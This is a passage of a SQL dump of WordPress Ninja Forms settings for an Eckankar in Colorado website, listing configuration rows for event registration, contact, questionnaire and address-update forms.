Registration'),(1856,47,'default_label_pos','above','default_label_pos','above'),(1857,47,'show_title','1','show_title','1'),(1858,47,'clear_complete','1','clear_complete','1'),(1859,47,'hide_complete','1','hide_complete','1'),(1860,47,'logged_in','0','logged_in','0'),(1861,47,'key','','key',''),(1862,47,'wrapper_class','','wrapper_class',''),(1863,47,'element_class','','element_class',''),(1864,47,'add_submit','0','add_submit','0'),(1865,47,'not_logged_in_msg','','not_logged_in_msg',''),(1866,47,'sub_limit_number','','sub_limit_number',''),(1867,47,'sub_limit_msg','','sub_limit_msg',''),(1868,47,'calculations','a:0:{}','calculations','a:0:{}'),(1869,47,'formContentData','a:13:{i:0;s:23:\"event_intro_description\";i:1;s:2:\"hr\";i:2;s:9:\"firstname\";i:3;s:8:\"lastname\";i:4;s:5:\"email\";i:5;s:7:\"textbox\";i:6;s:4:\"hr_1\";i:7;s:37:\"how_many_friends_will_you_bring_along\";i:8;s:21:\"any_food_requirements\";i:9;s:15:\"preferred_drink\";i:10;s:4:\"hr_2\";i:11;s:4:\"html\";i:12;s:8:\"register\";}','formContentData','a:13:{i:0;s:23:\"event_intro_description\";i:1;s:2:\"hr\";i:2;s:9:\"firstname\";i:3;s:8:\"lastname\";i:4;s:5:\"email\";i:5;s:7:\"textbox\";i:6;s:4:\"hr_1\";i:7;s:37:\"how_many_friends_will_you_bring_along\";i:8;s:21:\"any_food_requirements\";i:9;s:15:\"preferred_drink\";i:10;s:4:\"hr_2\";i:11;s:4:\"html\";i:12;s:8:\"register\";}'),(1870,47,'currency','','currency',''),(1871,47,'unique_field_error','A form with this value has already been submitted.','unique_field_error','A form with this value has already been submitted.'),(1872,48,'objectType','Form Setting','objectType','Form Setting'),(1873,48,'editActive','1','editActive','1'),(1874,48,'title','Event Registration',NULL,NULL),(1875,48,'created_at','2021-05-19 08:12:04','created_at','2021-05-19 08:12:04'),(1876,48,'default_label_pos','above','default_label_pos','above'),(1877,48,'show_title','0','show_title','0'),(1878,48,'clear_complete','1','clear_complete','1'),(1879,48,'hide_complete','1','hide_complete','1'),(1880,48,'logged_in','0','logged_in','0'),(1881,48,'key','','key',''),(1882,48,'wrapper_class','','wrapper_class',''),(1883,48,'element_class','','element_class',''),(1884,48,'add_submit','0','add_submit','0'),(1885,48,'not_logged_in_msg','','not_logged_in_msg',''),(1886,48,'sub_limit_number','','sub_limit_number',''),(1887,48,'sub_limit_msg','','sub_limit_msg',''),(1888,48,'calculations','a:0:{}','calculations','a:0:{}'),(1889,48,'formContentData','a:7:{i:0;s:77:\"book_discussion_registration_-autobiography_of_a_modern_prophet_1621437234063\";i:1;s:2:\"hr\";i:2;s:9:\"firstname\";i:3;s:8:\"lastname\";i:4;s:5:\"email\";i:5;s:159:\"your_email_address_and_other_information_will_not_be_shared_with_any_third_parties_for_any_reason_it_will_only_be_used_to_respond_to_your_request_1617158441662\";i:6;s:20:\"submit_1618628929218\";}','formContentData','a:7:{i:0;s:77:\"book_discussion_registration_-autobiography_of_a_modern_prophet_1621437234063\";i:1;s:2:\"hr\";i:2;s:9:\"firstname\";i:3;s:8:\"lastname\";i:4;s:5:\"email\";i:5;s:159:\"your_email_address_and_other_information_will_not_be_shared_with_any_third_parties_for_any_reason_it_will_only_be_used_to_respond_to_your_request_1617158441662\";i:6;s:20:\"submit_1618628929218\";}'),(1890,48,'currency','','currency',''),(1891,48,'unique_field_error','A form with this value has already been submitted.','unique_field_error','A form with this value has already been submitted.'),(1892,48,'repeatable_fieldsets','','repeatable_fieldsets',''),(1893,48,'changeEmailErrorMsg','','changeEmailErrorMsg',''),(1894,48,'changeDateErrorMsg','','changeDateErrorMsg',''),(1895,48,'confirmFieldErrorMsg','','confirmFieldErrorMsg',''),(1896,48,'fieldNumberNumMinError','','fieldNumberNumMinError',''),(1897,48,'fieldNumberNumMaxError','','fieldNumberNumMaxError',''),(1898,48,'fieldNumberIncrementBy','','fieldNumberIncrementBy',''),(1899,48,'formErrorsCorrectErrors','','formErrorsCorrectErrors',''),(1900,48,'validateRequiredField','','validateRequiredField',''),(1901,48,'honeypotHoneypotError','','honeypotHoneypotError',''),(1902,48,'fieldsMarkedRequired','','fieldsMarkedRequired',''),(1903,48,'drawerDisabled','','drawerDisabled',''),(1904,48,'seq_num',NULL,'seq_num',NULL),(1905,48,'allow_public_link','0','allow_public_link','0'),(1906,48,'embed_form','','embed_form',''),(1907,48,'_seq_num','16','_seq_num','16'),(1908,49,'objectType','Form Setting','objectType','Form Setting'),(1909,49,'editActive','1','editActive','1'),(1910,49,'title','Eckankar In Colorado Contact Form',NULL,NULL),(1911,49,'created_at','2021-05-21 19:29:40','created_at','2021-05-21 19:29:40'),(1912,49,'default_label_pos','above','default_label_pos','above'),(1913,49,'show_title','0','show_title','0'),(1914,49,'clear_complete','1','clear_complete','1'),(1915,49,'hide_complete','1','hide_complete','1'),(1916,49,'logged_in','0','logged_in','0'),(1917,49,'date_updated','2016-03-03 03:15:50','date_updated','2016-03-03 03:15:50'),(1918,49,'status','','status',''),(1919,49,'append_page','','append_page',''),(1920,49,'ajax','0','ajax','0'),(1921,49,'not_logged_in_msg','','not_logged_in_msg',''),(1922,49,'sub_limit_number','','sub_limit_number',''),(1923,49,'sub_limit_msg','','sub_limit_msg',''),(1924,49,'last_sub','36','last_sub','36'),(1925,49,'conditions','a:0:{}','conditions','a:0:{}'),(1926,49,'wrapper_class','','wrapper_class',''),(1927,49,'element_class','','element_class',''),(1928,49,'key','','key',''),(1929,49,'add_submit','1','add_submit','1'),(1930,49,'currency','','currency',''),(1931,49,'unique_field_error','A form with this value has already been submitted.','unique_field_error','A form with this value has already been submitted.'),(1932,49,'calculations','a:0:{}','calculations','a:0:{}'),(1933,49,'formContentData','a:9:{i:0;s:11:\"textbox_268\";i:1;s:12:\"lastname_269\";i:2;s:19:\"phone_1599585699152\";i:3;s:9:\"email_270\";i:4;s:11:\"textbox_303\";i:5;s:44:\"please_enter_your_message_here_1599585729237\";i:6;s:8:\"html_305\";i:7;s:18:\"html_1663800425943\";i:8;s:10:\"submit_278\";}','formContentData','a:9:{i:0;s:11:\"textbox_268\";i:1;s:12:\"lastname_269\";i:2;s:19:\"phone_1599585699152\";i:3;s:9:\"email_270\";i:4;s:11:\"textbox_303\";i:5;s:44:\"please_enter_your_message_here_1599585729237\";i:6;s:8:\"html_305\";i:7;s:18:\"html_1663800425943\";i:8;s:10:\"submit_278\";}'),(1934,49,'changeEmailErrorMsg','','changeEmailErrorMsg',''),(1935,49,'changeDateErrorMsg','','changeDateErrorMsg',''),(1936,49,'confirmFieldErrorMsg','','confirmFieldErrorMsg',''),(1937,49,'fieldNumberNumMinError','','fieldNumberNumMinError',''),(1938,49,'fieldNumberNumMaxError','','fieldNumberNumMaxError',''),(1939,49,'fieldNumberIncrementBy','','fieldNumberIncrementBy',''),(1940,49,'formErrorsCorrectErrors','','formErrorsCorrectErrors',''),(1941,49,'validateRequiredField','','validateRequiredField',''),(1942,49,'honeypotHoneypotError','','honeypotHoneypotError',''),(1943,49,'fieldsMarkedRequired','','fieldsMarkedRequired',''),(1944,49,'drawerDisabled','','drawerDisabled',''),(1945,49,'seq_num',NULL,'seq_num',NULL),(1946,49,'repeatable_fieldsets','','repeatable_fieldsets',''),(1947,49,'allow_public_link','0','allow_public_link','0'),(1948,49,'embed_form','','embed_form',''),(1949,49,'_seq_num','13','_seq_num','13'),(1950,50,'objectType','Form Setting','objectType','Form Setting'),(1951,50,'editActive','1','editActive','1'),(1952,50,'title','Questionnaire','title','Questionnaire'),(1953,50,'show_title','0','show_title','0'),(1954,50,'clear_complete','1','clear_complete','1'),(1955,50,'hide_complete','1','hide_complete','1'),(1956,50,'default_label_pos','above','default_label_pos','above'),(1957,50,'wrapper_class','','wrapper_class',''),(1958,50,'element_class','','element_class',''),(1959,50,'key','','key',''),(1960,50,'add_submit','1','add_submit','1'),(1961,50,'currency','','currency',''),(1962,50,'unique_field_error','A form with this value has already been submitted.','unique_field_error','A form with this value has already been submitted.'),(1963,50,'logged_in','','logged_in',''),(1964,50,'not_logged_in_msg','','not_logged_in_msg',''),(1965,50,'sub_limit_msg','The form has reached its submission limit.','sub_limit_msg','The form has reached its submission limit.'),(1966,50,'calculations','a:0:{}','calculations','a:0:{}'),(1967,50,'formContentData','a:12:{i:0;s:23:\"firstname_1523910710496\";i:1;s:22:\"lastname_1523910710972\";i:2;s:19:\"email_1523910925640\";i:3;s:32:\"email_confirmation_1523911122242\";i:4;s:35:\"gender_identification_1523910801816\";i:5;s:17:\"age_1523910843594\";i:6;s:24:\"question_1_1523910940120\";i:7;s:24:\"question_2_1523910945938\";i:8;s:24:\"question_3_1523910957654\";i:9;s:24:\"question_4_1523910969934\";i:10;s:24:\"question_5_1523910981688\";i:11;s:20:\"submit_1523910734890\";}','formContentData','a:12:{i:0;s:23:\"firstname_1523910710496\";i:1;s:22:\"lastname_1523910710972\";i:2;s:19:\"email_1523910925640\";i:3;s:32:\"email_confirmation_1523911122242\";i:4;s:35:\"gender_identification_1523910801816\";i:5;s:17:\"age_1523910843594\";i:6;s:24:\"question_1_1523910940120\";i:7;s:24:\"question_2_1523910945938\";i:8;s:24:\"question_3_1523910957654\";i:9;s:24:\"question_4_1523910969934\";i:10;s:24:\"question_5_1523910981688\";i:11;s:20:\"submit_1523910734890\";}'),(1968,50,'drawerDisabled','','drawerDisabled',''),(1969,51,'objectType','Form Setting','objectType','Form Setting'),(1970,51,'editActive','1','editActive','1'),(1971,51,'title','Event Registration',NULL,NULL),(1972,51,'created_at','2021-08-29 12:58:19','created_at','2021-08-29 12:58:19'),(1973,51,'default_label_pos','above','default_label_pos','above'),(1974,51,'show_title','0','show_title','0'),(1975,51,'clear_complete','1','clear_complete','1'),(1976,51,'hide_complete','1','hide_complete','1'),(1977,51,'logged_in','0','logged_in','0'),(1978,51,'key','','key',''),(1979,51,'wrapper_class','','wrapper_class',''),(1980,51,'element_class','','element_class',''),(1981,51,'add_submit','0','add_submit','0'),(1982,51,'not_logged_in_msg','','not_logged_in_msg',''),(1983,51,'sub_limit_number','','sub_limit_number',''),(1984,51,'sub_limit_msg','','sub_limit_msg',''),(1985,51,'calculations','a:0:{}','calculations','a:0:{}'),(1986,51,'formContentData','a:7:{i:0;s:88:\"loveland_-_book_discussion_registration_-autobiography_of_a_modern_prophet_1630271086284\";i:1;s:2:\"hr\";i:2;s:9:\"firstname\";i:3;s:8:\"lastname\";i:4;s:5:\"email\";i:5;s:159:\"your_email_address_and_other_information_will_not_be_shared_with_any_third_parties_for_any_reason_it_will_only_be_used_to_respond_to_your_request_1617158441662\";i:6;s:20:\"submit_1618628929218\";}','formContentData','a:7:{i:0;s:88:\"loveland_-_book_discussion_registration_-autobiography_of_a_modern_prophet_1630271086284\";i:1;s:2:\"hr\";i:2;s:9:\"firstname\";i:3;s:8:\"lastname\";i:4;s:5:\"email\";i:5;s:159:\"your_email_address_and_other_information_will_not_be_shared_with_any_third_parties_for_any_reason_it_will_only_be_used_to_respond_to_your_request_1617158441662\";i:6;s:20:\"submit_1618628929218\";}'),(1987,51,'currency','','currency',''),(1988,51,'unique_field_error','A form with this value has already been submitted.','unique_field_error','A form with this value has already been submitted.'),(1989,51,'repeatable_fieldsets','','repeatable_fieldsets',''),(1990,51,'changeEmailErrorMsg','','changeEmailErrorMsg',''),(1991,51,'changeDateErrorMsg','','changeDateErrorMsg',''),(1992,51,'confirmFieldErrorMsg','','confirmFieldErrorMsg',''),(1993,51,'fieldNumberNumMinError','','fieldNumberNumMinError',''),(1994,51,'fieldNumberNumMaxError','','fieldNumberNumMaxError',''),(1995,51,'fieldNumberIncrementBy','','fieldNumberIncrementBy',''),(1996,51,'formErrorsCorrectErrors','','formErrorsCorrectErrors',''),(1997,51,'validateRequiredField','','validateRequiredField',''),(1998,51,'honeypotHoneypotError','','honeypotHoneypotError',''),(1999,51,'fieldsMarkedRequired','','fieldsMarkedRequired',''),(2000,51,'drawerDisabled','','drawerDisabled',''),(2001,51,'seq_num',NULL,'seq_num',NULL),(2002,51,'allow_public_link','0','allow_public_link','0'),(2003,51,'embed_form','','embed_form',''),(2004,51,'_seq_num','9','_seq_num','9'),(2043,53,'formContentData','a:14:{i:0;s:8:\"html_201\";i:1;s:11:\"textbox_202\";i:2;s:12:\"lastname_203\";i:3;s:9:\"phone_205\";i:4;s:9:\"email_204\";i:5;s:58:\"street_address_add_or_update_mailing_address_1616603898544\";i:6;s:8:\"city_216\";i:7;s:14:\"listselect_218\";i:8;s:15:\"listcountry_219\";i:9;s:6:\"hr_207\";i:10;s:12:\"textarea_210\";i:11;s:18:\"html_1663797542883\";i:12;s:10:\"submit_212\";i:13;s:18:\"html_1663797539003\";}','formContentData','a:14:{i:0;s:8:\"html_201\";i:1;s:11:\"textbox_202\";i:2;s:12:\"lastname_203\";i:3;s:9:\"phone_205\";i:4;s:9:\"email_204\";i:5;s:58:\"street_address_add_or_update_mailing_address_1616603898544\";i:6;s:8:\"city_216\";i:7;s:14:\"listselect_218\";i:8;s:15:\"listcountry_219\";i:9;s:6:\"hr_207\";i:10;s:12:\"textarea_210\";i:11;s:18:\"html_1663797542883\";i:12;s:10:\"submit_212\";i:13;s:18:\"html_1663797539003\";}'),(2044,53,'calculations','a:0:{}','calculations','a:0:{}'),(2045,53,'unique_field_error','A form with this value has already been submitted.','unique_field_error','A form with this value has already been submitted.'),(2046,53,'key','','key',''),(2047,53,'add_submit','1','add_submit','1'),(2048,53,'currency','','currency',''),(2049,53,'created_at','2022-02-17 08:38:19','created_at','2022-02-17 08:38:19'),(2050,53,'default_label_pos','above','default_label_pos','above'),(2051,53,'seq_num',NULL,'seq_num',NULL),(2052,53,'objectType','Form Setting','objectType','Form Setting'),(2053,53,'editActive','1','editActive','1'),(2054,53,'wrapper_class','','wrapper_class',''),(2055,53,'element_class','','element_class',''),(2056,53,'date_updated','2016-02-19 00:14:49','date_updated','2016-02-19 00:14:49'),(2057,53,'clear_complete','1','clear_complete','1'),(2058,53,'hide_complete','1','hide_complete','1'),(2059,53,'show_title','0','show_title','0'),(2060,53,'status','','status',''),(2061,53,'append_page','','append_page',''),(2062,53,'ajax','0','ajax','0'),(2063,53,'logged_in','0','logged_in','0'),(2064,53,'not_logged_in_msg','','not_logged_in_msg',''),(2065,53,'sub_limit_number','','sub_limit_number',''),(2066,53,'sub_limit_msg','','sub_limit_msg',''),(2067,53,'last_sub','5','last_sub','5'),(2068,53,'title','Add/Update Email or Address',NULL,NULL),(2069,53,'conditions','a:0:{}','conditions','a:0:{}'),(2070,53,'repeatable_fieldsets','','repeatable_fieldsets',''),(2071,4,'changeEmailErrorMsg','','changeEmailErrorMsg',''),(2072,4,'changeDateErrorMsg','','changeDateErrorMsg',''),(2073,4,'confirmFieldErrorMsg','','confirmFieldErrorMsg',''),(2074,4,'fieldNumberNumMinError','','fieldNumberNumMinError',''),(2075,4,'fieldNumberNumMaxError','','fieldNumberNumMaxError',''),(2076,4,'fieldNumberIncrementBy','','fieldNumberIncrementBy',''),(2077,4,'formErrorsCorrectErrors','','formErrorsCorrectErrors',''),(2078,4,'validateRequiredField','','validateRequiredField',''),(2079,4,'honeypotHoneypotError','','honeypotHoneypotError',''),(2080,4,'fieldsMarkedRequired','','fieldsMarkedRequired',''),(2081,4,'drawerDisabled','','drawerDisabled',''),(2082,53,'allow_public_link','0','allow_public_link','0'),(2083,53,'embed_form','','embed_form',''),(2084,53,'changeEmailErrorMsg','','changeEmailErrorMsg',''),(2085,53,'changeDateErrorMsg','','changeDateErrorMsg',''),(2086,53,'confirmFieldErrorMsg','','confirmFieldErrorMsg',''),(2087,53,'fieldNumberNumMinError','','fieldNumberNumMinError',''),(2088,53,'fieldNumberNumMaxError','','fieldNumberNumMaxError',''),(2089,53,'fieldNumberIncrementBy','','fieldNumberIncrementBy',''),(2090,53,'formErrorsCorrectErrors','','formErrorsCorrectErrors',''),(2091,53,'validateRequiredField','','validateRequiredField',''),(2092,53,'honeypotHoneypotError','','honeypotHoneypotError',''),(2093,53,'fieldsMarkedRequired','','fieldsMarkedRequired',''),(2094,53,'drawerDisabled','','drawerDisabled',''),(2095,53,'_seq_num','17','_seq_num','17'),(2096,54,'objectType','Form Setting','objectType','Form Setting'),(2097,54,'editActive','1','editActive','1'),(2098,54,'title','Event Registration',NULL,NULL),(2099,54,'created_at','2022-03-02 07:44:18','created_at','2022-03-02 07:44:18'),(2100,54,'default_label_pos','above','default_label_pos','above'),(2101,54,'show_title','0','show_title','0'),(2102,54,'clear_complete','1','clear_complete','1'),(2103,54,'hide_complete','1','hide_complete','1'),(2104,54,'logged_in','0','logged_in','0'),(2105,54,'key','','key',''),(2106,54,'wrapper_class','','wrapper_class',''),(2107,54,'element_class','','element_class',''),(2108,54,'add_submit','0','add_submit','0'),(2109,54,'not_logged_in_msg','','not_logged_in_msg',''),(2110,54,'sub_limit_number','','sub_limit_number',''),(2111,54,'sub_limit_msg','','sub_limit_msg',''),(2112,54,'calculations','a:0:{}','calculations','a:0:{}'),(2113,54,'formContentData','a:7:{i:0;s:54:\"statewide_satsang_intensive_registration_1646235944769\";i:1;s:2:\"hr\";i:2;s:9:\"firstname\";i:3;s:8:\"lastname\";i:4;s:5:\"email\";i:5;s:159:\"your_email_address_and_other_information_will_not_be_shared_with_any_third_parties_for_any_reason_it_will_only_be_used_to_respond_to_your_request_1617158441662\";i:6;s:20:\"submit_1618628929218\";}','formContentData','a:7:{i:0;s:54:\"statewide_satsang_intensive_registration_1646235944769\";i:1;s:2:\"hr\";i:2;s:9:\"firstname\";i:3;s:8:\"lastname\";i:4;s:5:\"email\";i:5;s:159:\"your_email_address_and_other_information_will_not_be_shared_with_any_third_parties_for_any_reason_it_will_only_be_used_to_respond_to_your_request_1617158441662\";i:6;s:20:\"submit_1618628929218\";}'),(2114,54,'currency','','currency',''),(2115,54,'unique_field_error','A form with this value has already been submitted.','unique_field_error','A form with this value has already been submitted.'),(2116,54,'repeatable_fieldsets','','repeatable_fieldsets',''),(2117,54,'changeEmailErrorMsg','','changeEmailErrorMsg',''),(2118,54,'changeDateErrorMsg','','changeDateErrorMsg',''),(2119,54,'confirmFieldErrorMsg','','confirmFieldErrorMsg',''),(2120,54,'fieldNumberNumMinError','','fieldNumberNumMinError',''),(2121,54,'fieldNumberNumMaxError','','fieldNumberNumMaxError',''),(2122,54,'fieldNumberIncrementBy','','fieldNumberIncrementBy',''),(2123,54,'formErrorsCorrectErrors','','formErrorsCorrectErrors',''),(2124,54,'validateRequiredField','','validateRequiredField',''),(2125,54,'honeypotHoneypotError','','honeypotHoneypotError',''),(2126,54,'fieldsMarkedRequired','','fieldsMarkedRequired',''),(2127,54,'drawerDisabled','','drawerDisabled',''),(2128,54,'seq_num',NULL,'seq_num',NULL),(2129,54,'allow_public_link','0','allow_public_link','0'),(2130,54,'embed_form','','embed_form',''),(2131,54,'_seq_num','2','_seq_num','2'),(2132,55,'objectType','Form Setting','objectType','Form Setting'),(2133,55,'editActive','','editActive',''),(2134,55,'title','Event Registration','title','Event Registration'),(2135,55,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),(2136,55,'form_title','Event Registration','form_title','Event Registration'),(2137,55,'default_label_pos','above','default_label_pos','above'),(2138,55,'show_title','1','show_title','1'),(2139,55,'clear_complete','1','clear_complete','1'),(2140,55,'hide_complete','1','hide_complete','1'),(2141,55,'logged_in','0','logged_in','0'),(2142,55,'key','','key',''),(2143,55,'wrapper_class','','wrapper_class',''),(2144,55,'element_class','','element_class',''),(2145,55,'add_submit','0','add_submit','0'),(2146,55,'not_logged_in_msg','','not_logged_in_msg',''),(2147,55,'sub_limit_number','','sub_limit_number',''),(2148,55,'sub_limit_msg','','sub_limit_msg',''),(2149,55,'calculations','a:0:{}','calculations','a:0:{}'),(2150,55,'formContentData','a:11:{i:0;s:37:\"eck_temple_beautify_day_1649193811532\";i:1;s:2:\"hr\";i:2;s:9:\"firstname\";i:3;s:8:\"lastname\";i:4;s:5:\"email\";i:5;s:7:\"textbox\";i:6;s:4:\"hr_1\";i:7;s:78:\"let_us_know_if_you_need_more_event_information_or_have_questions_1649193768671\";i:8;s:4:\"hr_2\";i:9;s:4:\"html\";i:10;s:20:\"submit_1649194061669\";}','formContentData','a:11:{i:0;s:37:\"eck_temple_beautify_day_1649193811532\";i:1;s:2:\"hr\";i:2;s:9:\"firstname\";i:3;s:8:\"lastname\";i:4;s:5:\"email\";i:5;s:7:\"textbox\";i:6;s:4:\"hr_1\";i:7;s:78:\"let_us_know_if_you_need_more_event_information_or_have_questions_1649193768671\";i:8;s:4:\"hr_2\";i:9;s:4:\"html\";i:10;s:20:\"submit_1649194061669\";}'),(2151,55,'currency','','currency',''),(2152,55,'unique_field_error','A form with this value has already been submitted.','unique_field_error','A form with this value has already been submitted.'),(2153,55,'seq_num',NULL,'seq_num',NULL),(2154,55,'allow_public_link','0','allow_public_link','0'),(2155,55,'embed_form','','embed_form',''),(2156,55,'repeatable_fieldsets','','repeatable_fieldsets',''),(2157,56,'date_updated','2016-03-03 03:15:50','date_updated','2016-03-03 03:15:50'),(2158,56,'clear_complete','1','clear_complete','1'),(2159,56,'hide_complete','1','hide_complete','1'),(2160,56,'show_title','0','show_title','0'),(2161,56,'status','','status',''),(2162,56,'append_page','','append_page',''),(2163,56,'ajax','0','ajax','0'),(2164,56,'logged_in','0','logged_in','0'),(2165,56,'not_logged_in_msg','','not_logged_in_msg',''),(2166,56,'sub_limit_number','','sub_limit_number',''),(2167,56,'sub_limit_msg','','sub_limit_msg',''),(2168,56,'last_sub','36','last_sub','36'),(2169,56,'title','Eckankar In Colorado Contact Form',NULL,NULL),(2170,56,'conditions','a:0:{}','conditions','a:0:{}'),(2171,56,'created_at','2022-04-05 14:40:44','created_at','2022-04-05 14:40:44'),(2172,56,'default_label_pos','above','default_label_pos','above'),(2173,56,'seq_num',NULL,'seq_num',NULL),(2174,56,'objectType','Form Setting','objectType','Form Setting'),(2175,56,'editActive','1','editActive','1'),(2176,56,'wrapper_class','','wrapper_class',''),(2177,56,'element_class','','element_class',''),(2178,56,'key','','key',''),(2179,56,'add_submit','1','add_submit','1'),(2180,56,'currency','','currency',''),(2181,56,'unique_field_error','A form with this value has already been submitted.','unique_field_error','A form with this value has already been submitted.'),(2182,56,'calculations','a:0:{}','calculations','a:0:{}'),(2183,56,'formContentData','a:9:{i:0;s:8:\"html_267\";i:1;s:11:\"textbox_268\";i:2;s:12:\"lastname_269\";i:3;s:9:\"email_270\";i:4;s:6:\"hr_273\";i:5;s:56:\"if_you_have_a_message_please_enter_it_here_1649199448265\";i:6;s:8:\"html_305\";i:7;s:13:\"recaptcha_277\";i:8;s:10:\"submit_278\";}','formContentData','a:9:{i:0;s:8:\"html_267\";i:1;s:11:\"textbox_268\";i:2;s:12:\"lastname_269\";i:3;s:9:\"email_270\";i:4;s:6:\"hr_273\";i:5;s:56:\"if_you_have_a_message_please_enter_it_here_1649199448265\";i:6;s:8:\"html_305\";i:7;s:13:\"recaptcha_277\";i:8;s:10:\"submit_278\";}'),(2184,56,'repeatable_fieldsets','','repeatable_fieldsets',''),(2185,56,'allow_public_link','0','allow_public_link','0'),(2186,56,'embed_form','','embed_form',''),(2187,56,'changeEmailErrorMsg','','changeEmailErrorMsg',''),(2188,56,'changeDateErrorMsg','','changeDateErrorMsg',''),(2189,56,'confirmFieldErrorMsg','','confirmFieldErrorMsg',''),(2190,56,'fieldNumberNumMinError','','fieldNumberNumMinError',''),(2191,56,'fieldNumberNumMaxError','','fieldNumberNumMaxError',''),(2192,56,'fieldNumberIncrementBy','','fieldNumberIncrementBy',''),(2193,56,'formErrorsCorrectErrors','','formErrorsCorrectErrors',''),(2194,56,'validateRequiredField','','validateRequiredField',''),(2195,56,'honeypotHoneypotError','','honeypotHoneypotError',''),(2196,56,'fieldsMarkedRequired','','fieldsMarkedRequired',''),(2197,56,'drawerDisabled','','drawerDisabled',''),(2198,56,'_seq_num','10','_seq_num','10'),(2236,1,'_seq_num','3','_seq_num','3'),(2473,61,'_seq_num','123','_seq_num','123'),(2312,60,'date_updated','2016-03-03 03:15:50','date_updated','2016-03-03 03:15:50'),(2313,60,'clear_complete','1','clear_complete','1'),(2314,60,'hide_complete','1','hide_complete','1'),(2315,60,'show_title','0','show_title','0'),(2316,60,'status','','status',''),(2317,60,'append_page','','append_page',''),(2318,60,'ajax','0','ajax','0'),(2319,60,'logged_in','0','logged_in','0'),(2320,60,'not_logged_in_msg','','not_logged_in_msg',''),(2321,60,'sub_limit_number','','sub_limit_number',''),(2322,60,'sub_limit_msg','','sub_limit_msg',''),(2323,60,'last_sub','36','last_sub','36'),(2324,60,'title','Eckankar In Colorado Contact Form',NULL,NULL),(2325,60,'conditions','a:0:{}','conditions','a:0:{}'),(2326,60,'created_at','2022-09-20 23:27:15','created_at','2022-09-20 23:27:15'),(2327,60,'default_label_pos','above','default_label_pos','above'),(2328,60,'seq_num',NULL,'seq_num',NULL),(2329,60,'objectType','Form Setting','objectType','Form Setting'),(2330,60,'editActive','1','editActive','1'),(2331,60,'wrapper_class','','wrapper_class',''),(2332,60,'element_class','','element_class',''),(2333,60,'key','','key',''),(2334,60,'add_submit','1','add_submit','1'),(2335,60,'currency','','currency',''),(2336,60,'unique_field_error','A form with this value has already been submitted.','unique_field_error','A form with this value has already been submitted.'),(2337,60,'calculations','a:0:{}','calculations','a:0:{}'),(2338,60,'formContentData','a:9:{i:0;s:8:\"html_267\";i:1;s:11:\"textbox_268\";i:2;s:12:\"lastname_269\";i:3;s:9:\"email_270\";i:4;s:6:\"hr_273\";i:5;s:11:\"textbox_303\";i:6;s:12:\"textarea_276\";i:7;s:8:\"html_305\";i:8;s:10:\"submit_278\";}','formContentData','a:9:{i:0;s:8:\"html_267\";i:1;s:11:\"textbox_268\";i:2;s:12:\"lastname_269\";i:3;s:9:\"email_270\";i:4;s:6:\"hr_273\";i:5;s:11:\"textbox_303\";i:6;s:12:\"textarea_276\";i:7;s:8:\"html_305\";i:8;s:10:\"submit_278\";}'),(2339,60,'repeatable_fieldsets','','repeatable_fieldsets',''),(2340,60,'allow_public_link','0','allow_public_link','0'),(2341,60,'embed_form','','embed_form',''),(2342,60,'changeEmailErrorMsg','','changeEmailErrorMsg',''),(2343,60,'changeDateErrorMsg','','changeDateErrorMsg',''),(2344,60,'confirmFieldErrorMsg','','confirmFieldErrorMsg',''),(2345,60,'fieldNumberNumMinError','','fieldNumberNumMinError',''),(2346,60,'fieldNumberNumMaxError','','fieldNumberNumMaxError',''),(2347,60,'fieldNumberIncrementBy','','fieldNumberIncrementBy',''),(2348,60,'formErrorsCorrectErrors','','formErrorsCorrectErrors',''),(2349,60,'validateRequiredField','','validateRequiredField',''),(2350,60,'honeypotHoneypotError','','honeypotHoneypotError',''),(2351,60,'fieldsMarkedRequired','','fieldsMarkedRequired',''),(2352,60,'drawerDisabled','','drawerDisabled',''),(2353,61,'objectType','Form Setting','objectType','Form Setting'),(2354,61,'editActive','1','editActive','1'),(2355,61,'title','Event Registration',NULL,NULL),(2356,61,'created_at','2023-02-01 08:31:40','created_at','2023-02-01 08:31:40'),(2357,61,'form_title','Event Registration',NULL,NULL),(2358,61,'default_label_pos','above','default_label_pos','above'),(2359,61,'show_title','0','show_title','0'),(2360,61,'clear_complete','1','clear_complete','1'),(2361,61,'hide_complete','1','hide_complete','1'),(2362,61,'logged_in','0','logged_in','0'),(2363,61,'key','','key',''),(2364,61,'wrapper_class','','wrapper_class',''),(2365,61,'element_class','','element_class',''),(2366,61,'add_submit','0','add_submit','0'),(2367,61,'not_logged_in_msg','','not_logged_in_msg',''),(2368,61,'sub_limit_number','','sub_limit_number',''),(2369,61,'sub_limit_msg','<p><br></p>','sub_limit_msg','<p><br></p>'),(2370,61,'calculations','a:0:{}','calculations','a:0:{}'),(2371,61,'formContentData','a:13:{i:0;s:18:\"html_1632671894259\";i:1;s:16:\"hr_1639606449220\";i:2;s:40:\"satsang_class_registration_1632437126898\";i:3;s:108:\"less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_first_name_1662052173711\";i:4;s:107:\"less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_last_name_1662052180625\";i:5;s:107:\"less_than_i_class_fa_fa-envelope_aria-hidden_true_greater_than_less_than_i_greater_than_email_1662052219837\";i:6;s:104:\"less_than_i_class_fa_fa-phone_aria-hidden_true_greater_than_less_than_i_greater_than_phone_1662051810498\";i:7;s:56:\"eck_member_classes_available_for_2023-2024_1693928528054\";i:8;s:45:\"select_one_class_per_registrant_1658696832524\";i:9;s:48:\"enter_message_for_arahata_optional_1599679737041\";i:10;s:4:\"hr_2\";i:11;s:4:\"html\";i:12;s:8:\"register\";}','formContentData','a:13:{i:0;s:18:\"html_1632671894259\";i:1;s:16:\"hr_1639606449220\";i:2;s:40:\"satsang_class_registration_1632437126898\";i:3;s:108:\"less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_first_name_1662052173711\";i:4;s:107:\"less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_last_name_1662052180625\";i:5;s:107:\"less_than_i_class_fa_fa-envelope_aria-hidden_true_greater_than_less_than_i_greater_than_email_1662052219837\";i:6;s:104:\"less_than_i_class_fa_fa-phone_aria-hidden_true_greater_than_less_than_i_greater_than_phone_1662051810498\";i:7;s:56:\"eck_member_classes_available_for_2023-2024_1693928528054\";i:8;s:45:\"select_one_class_per_registrant_1658696832524\";i:9;s:48:\"enter_message_for_arahata_optional_1599679737041\";i:10;s:4:\"hr_2\";i:11;s:4:\"html\";i:12;s:8:\"register\";}'),(2372,61,'currency','','currency',''),(2373,61,'unique_field_error',' 